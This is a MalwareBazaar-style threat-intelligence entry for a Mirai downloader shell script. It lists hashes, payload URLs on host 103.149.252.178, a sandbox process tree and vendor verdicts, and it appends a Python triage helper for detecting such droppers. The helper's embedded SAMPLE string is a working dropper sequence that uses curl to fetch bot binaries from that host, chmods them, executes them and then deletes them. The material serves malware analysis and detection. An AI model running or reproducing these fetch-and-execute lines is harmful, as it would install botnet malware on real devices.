MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 d3e4108a9092e282ca4b45c34dc00b84d19205f145f616c9d7014ea9acf0b57a. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

Mirai
Vendor detections: 7



SHA256 hash: d3e4108a9092e282ca4b45c34dc00b84d19205f145f616c9d7014ea9acf0b57a
SHA3-384 hash: ab38e0cd1a9a3efcd221bb9f4cbcacfb79f87e347e1de838aca326caf21070da2864dca7f3cdc609b2897856fd6e2674
SHA1 hash: f93bdc5bf970c38b72de58f5d7c6efc26d6030ec
MD5 hash: 6993fea956e1fb0383ce369ca0ebf325
humanhash: south-angel-tennessee-ohio
File name: curl.sh
Signature: Mirai
File size: 965 bytes
First seen: 2025-06-18 22:37:51 UTC
Last seen: 2025-06-18 23:12:01 UTC
File type: sh
MIME type: text/plain
ssdeep: 24:3J3Mcs+SokcsTSDPcsZNIxSyKcsFSIKxhcsATucsA+qcsAokGcsIRBWR/WRCcs9D:qd+SokdTSDPdKSyKdFSIShdATudA+qdb
TLSH: T11711BF9C10D0724E5B2DCFCBB25E83086E40CAD4B0FD9A96AA380733949F110B839B1A
Magika: shell
Reporter: abuse_ch
Tags: sh
Payload URLs referenced by this sample, with the MalwareBazaar entry for the downloaded file where one exists:

URL                                   Malware sample (SHA256 hash)                                        Signature  Tags
http://103.149.252.178/bot.arm        93eb8e223410f702c1be6d9388205a25066cd8ee5c669e1e0954eed51b61d99c    Mirai      elf mirai ua-wget
http://103.149.252.178/bot.arm5       67ba445f4d39c217eb3911c0b41ed7e4ca87c175535b1f08501e8d157c2bbd26    Mirai      elf mirai ua-wget
http://103.149.252.178/bot.arm6       61f1709d5d81bc6a521d005312751b7cfa5e5efa4a87b36c78d1df6a56166243    Mirai      elf mirai ua-wget
http://103.149.252.178/bot.arm7       99145d8a8d2bd7a401a9fac5ffc9413987eb507fd8f35b0be2d1641f285f4baa    Mirai      elf mirai ua-wget
http://103.149.252.178/bot.m68k       269ee46bd65dd8c96ad5ea5872ba50f12572714521430f410e73046afc372cee    Mirai      elf mirai ua-wget
http://103.149.252.178/bot.mips       e3b227f81a4eb81c43b5764316f3632fd41367cbb0706951b2375f43f906e8ff    Mirai      elf mirai ua-wget
http://103.149.252.178/bot.mpsl       9f1f56a03f2046fa18c79a9505f2a9fbb5272549da3eb9507b3495602246be54    Mirai      elf mirai ua-wget
http://103.149.252.178/bot.powerpc    n/a                                                                 n/a        n/a
http://103.149.252.178/bot.sh4        db65c6ad097c998d7cab2fd9bce177aa17f74a8179ac36a67c62f845285612b0    Mirai      elf mirai ua-wget
http://103.149.252.178/bot.x86        4427f663b9ef45d01d7925efe57d5670b5e27efc3e35c61abdda4786b681066d    Mirai      elf mirai ua-wget
http://103.149.252.178/bot.x86_64     dcf79d68228bb95fe49c4e3a9d0167aaef4abd8946bae55855d825b68b19cc26    Mirai      elf mirai ua-wget
http://103.149.252.178/bot.x86_32     n/a                                                                 n/a        n/a

Intelligence

File Origin
# of uploads: 2
# of downloads: 114
Origin country: DE

Vendor Threat Intelligence
Verdict: Malicious
Score: 94.9%
Tags: downloader trojan agent
Status: terminated
Behavior Graph (process tree recovered from the graph data; the sandbox ran the script as /tmp/sample.bin):
  /usr/bin/sudo (pid 2701)
    -> execve /tmp/sample.bin (pid 2710)
         Twelve repetitions of the same three-step cycle, one after another:
           -> execve /usr/bin/curl (net, send-data): pids 2712, 2893, 3047, 3184, 3265, 3419, 3694, 4085, 4193, 4542, 4764, 5040
           -> execve /usr/bin/chmod: pids 2890, 3044, 3182, 3263, 3416, 3689, 4080, 4190, 4537, 4760, 5038, 5123
           -> clone /usr/bin/dash: pids 2892, 3046, 3183, 3264, 3418, 3690, 4084, 4192, 4541, 4762, 5039, 5125
         -> execve /usr/bin/rm (pid 5126, delete-file) after the last cycle
  Network: each of the twelve curl processes sent a single request to 103.149.252.178:80 (the host of every bot.<arch> URL listed above); request sizes were 86, 87, 87, 87, 87, 87, 87, 90, 86, 86, 89 and 89 bytes. The URL table above lists twelve bot.<arch> payloads, matching the twelve curl/chmod/dash cycles.
Threat name: Linux.Trojan.Vigorf
Status: Malicious
First seen: 2025-06-18 22:42:09 UTC
File Type: Text (Shell)
AV detection: 13 of 24 (54.17%)
Threat level: 5/5

Result
Malware family: n/a
Score: 3/10
Tags: n/a
Behaviour:
  Modifies registry class
  Suspicious use of SetWindowsHookEx
  Enumerates physical storage devices
Note: these three behaviour entries reference Windows-only mechanisms (the registry, SetWindowsHookEx) and do not describe what a POSIX shell script does on a Linux host; the Linux behaviour of this sample is the curl/chmod/dash/rm process tree in the behaviour graph above.

Please note that we are no longer able to provide a coverage score for VirusTotal.
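The URL table and the behaviour graph above together describe the loader logic of this kind of script: fetch bot.<arch> from 103.149.252.178 with curl, chmod it, execute it, repeat once per architecture, then rm the evidence. The Python triage helper below is an added example, not MalwareBazaar code and not the contents of curl.sh: it pulls download URLs, hosts and target architectures out of a downloader shell script and flags the fetch, chmod, execute, cleanup chain. The embedded SAMPLE script is constructed for the example and only modelled on the behaviour graph; the function and field names (triage, Triage, matches_entry_host) are the example's own.

```python
"""Triage helper for Mirai-style downloader scripts (added example, not
MalwareBazaar code). Extracts download URLs / hosts / bot.<arch> targets
from a shell script and flags the fetch -> chmod -> execute -> rm chain
shown in the behaviour graph for curl.sh."""
import re
from dataclasses import dataclass, field

# Payload host listed in this entry's URL table.
KNOWN_HOST = "103.149.252.178"

URL_RE = re.compile(r"https?://[^\s'\";|&<>]+")
# Architecture suffixes of the bot.<arch> payloads listed in the URL table.
ARCH_RE = re.compile(r"^bot\.(arm[0-9]?|m68k|mips|mpsl|powerpc|sh4|x86(?:_32|_64)?)$")
FETCHERS = {"curl", "wget", "tftp", "ftpget"}
SHELLS = {"sh", "bash", "dash", "ash"}


@dataclass
class Triage:
    urls: list = field(default_factory=list)
    hosts: set = field(default_factory=set)
    archs: list = field(default_factory=list)
    fetches: int = 0
    chmods: int = 0
    executes: int = 0
    cleanup: bool = False              # rm issued after at least one fetch
    matches_entry_host: bool = False   # contacted the host from this entry
    verdict: str = "no-downloader-chain"


def _commands(script: str):
    """Yield argv lists for each simple command. Skips blank and comment
    lines and splits on ';', '&&' and '||' (sufficient for dropper one-liners;
    not a full shell parser)."""
    for raw in script.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        for cmd in re.split(r"\s*(?:;|&&|\|\|)\s*", line):
            argv = cmd.split()
            if argv:
                yield argv


def triage(script: str) -> Triage:
    t = Triage()
    dropped = set()  # basenames of files the script fetched
    for argv in _commands(script):
        prog = argv[0].rsplit("/", 1)[-1]
        if prog in FETCHERS:
            t.fetches += 1
            for url in URL_RE.findall(" ".join(argv)):
                t.urls.append(url)
                host = url.split("//", 1)[1].split("/", 1)[0].split(":")[0]
                t.hosts.add(host)
                name = url.rsplit("/", 1)[-1]
                dropped.add(name)
                m = ARCH_RE.search(name)
                if m:
                    t.archs.append(m.group(1))
        elif prog == "chmod":
            t.chmods += 1
        elif argv[0].startswith("./") or (
            prog in SHELLS and len(argv) > 1 and argv[1] in dropped
        ):
            t.executes += 1  # runs a dropped file directly or via a shell
        elif prog == "rm" and t.fetches:
            t.cleanup = True
    t.matches_entry_host = KNOWN_HOST in t.hosts
    if t.fetches and t.chmods and t.executes:
        # More than one architecture fetched is the multi-arch Mirai pattern.
        t.verdict = "multi-arch-dropper" if len(set(t.archs)) > 1 else "downloader-chain"
    return t


# Constructed test input modelled on the behaviour graph (curl -> chmod ->
# execute -> rm per architecture). It is NOT the contents of the real curl.sh.
SAMPLE = """#!/bin/sh
cd /tmp || cd /var/run || cd /mnt
curl -O http://103.149.252.178/bot.arm; chmod +x bot.arm; ./bot.arm; rm -rf bot.arm
curl -O http://103.149.252.178/bot.mips; chmod +x bot.mips; ./bot.mips; rm -rf bot.mips
curl -O http://103.149.252.178/bot.x86_64; chmod +x bot.x86_64; ./bot.x86_64; rm -rf bot.x86_64
rm -rf $0
"""

if __name__ == "__main__":
    r = triage(SAMPLE)
    print(r.verdict, sorted(r.hosts), r.archs, r.fetches, r.chmods, r.executes, r.cleanup)
```

The verdict requires all three stages (fetch, chmod, execute) so that a script which merely downloads a file is not flagged; the extracted hosts and bot.<arch> names are the IOCs to compare against the URL table above.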

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Delivery       Signature  File type  SHA256 hash
Web download   Mirai      sh         d3e4108a9092e282ca4b45c34dc00b84d19205f145f616c9d7014ea9acf0b57a (this sample)

Delivery method: Distributed via web download
